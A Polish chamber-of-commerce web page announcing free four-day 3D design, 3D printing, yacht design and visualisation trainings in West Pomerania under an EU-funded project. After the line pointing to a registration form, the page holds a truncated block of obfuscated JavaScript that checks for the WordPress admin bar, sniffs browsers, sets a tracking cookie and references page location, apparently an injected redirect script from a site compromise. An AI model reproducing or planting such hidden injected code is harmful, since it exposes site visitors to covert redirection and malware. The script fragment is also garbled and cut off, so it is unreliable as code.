II edycja szkoleń w ramach projektu „Świat w 3D” dofinansowanego ze środków Unii Europejskiej. | Północna Izba Gospodarcza w Koszalinie
II edycja szkoleń w ramach projektu „Świat w 3D” dofinansowanego ze środków Unii Europejskiej.
 
W związku z powyższym w Szczecinie, Wałczu, Szczecinku i Gryficach organizujemy bezpłatne, 4-dniowe specjalistyczne szkolenia z zakresu:
 Projektowanie 3D od podstaw, 
 Druk 3D w praktyce,
 Komputerowe projektowanie jachtów i łodzi,
– Tworzenie fotorealistycznych wizualizacji.
 
Grupa szkoleniowa liczy 8 osób. Miejsce i sprzęt niezbędny do przeprowadzenia szkolenia zapewnia organizator.
Projekt dedykowany jest osobom, które ukończyły 18 lat, zamieszkującym na obszarze województwa zachodniopomorskiego z wyłączeniem osób fizycznych prowadzących jednoosobową działalność gospodarczą i osób zajmujących się produkcją podstawową produktów rolnych.
Formularz zgłoszeniowy dostępny jest na naszej stronie internetowej:

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m